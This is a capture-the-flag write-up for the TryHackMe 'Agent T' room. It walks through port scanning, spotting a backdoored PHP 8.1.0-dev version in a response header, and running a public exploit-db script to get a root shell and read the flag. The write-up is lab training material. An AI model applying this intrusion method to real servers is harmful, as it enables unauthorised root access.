THM Writeup – Agent T

THM Writeup – Agent T

Something seems a little off with the server.

Room: Agent T

Difficulty: Easy

Operating System: Linux

Author: ben and JohnHammond and cmnatic and blacknote and timtaylor

Agent T uncovered this website, which looks innocent enough, but something seems off about how the server responds…

Add IP address to your hosts file:

echo '10.10.184.35    agentt.thm' >> /etc/hosts

Scan the target machine – find open ports first:

nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv agentt.thm

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 63

Get more details about open ports:

nmap -T4 -A -p 80 agentt.thm

PORT   STATE SERVICE VERSION
80/tcp open  http    PHP cli server 5.5 or later
|_http-title:  Admin Dashboard

We have only 1 port open: 80

Check web application on port 80 – browse to http://agentt.thm

Admin Dashboard

There is Admin Dashboard accessible without authentication.

I looked at the admin dashboard, checked the page source – found nothing of interest. Then I opened developer console (F12) and noticed an interesting value in the X-Powered-By header:

Admin Dashboard - http headers

I found out this version of PHP is vulnerable to Remote Code Execution:

php/8.1.0-dev exploit search results

I copied the exploit from exploit-db.com, saved it to a file named exploit.py, made it executable and executed it – this gave me interactive shell:

root@attackbox:~# nano exploit.py
root@attackbox:~# chmod +x exploit.py
root@attackbox:~# ./exploit.py 
Enter the full host url:
http://agentt.thm

Interactive shell is opened on http://agentt.thm 
Can't acces tty; job crontol turned off.
$ id
uid=0(root) gid=0(root) groups=0(root)

At this point I just looked around, found the flag and read it:

$ ls -la /root
total 16
drwx------ 2 root root 4096 Jan 11  2021 .
drwxr-xr-x 1 root root 4096 Mar  7 22:03 ..
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile

$ ls -la /home	
total 8
drwxr-xr-x 2 root root 4096 Nov 22  2020 .
drwxr-xr-x 1 root root 4096 Mar  7 22:03 ..

$ find / -type f -name flag.txt 2>/dev/null
/flag.txt

$ cat /flag.txt	
flag{[REDACTED]}

Do you like this writeup? Check out other THM Writeups.

Comments are closed.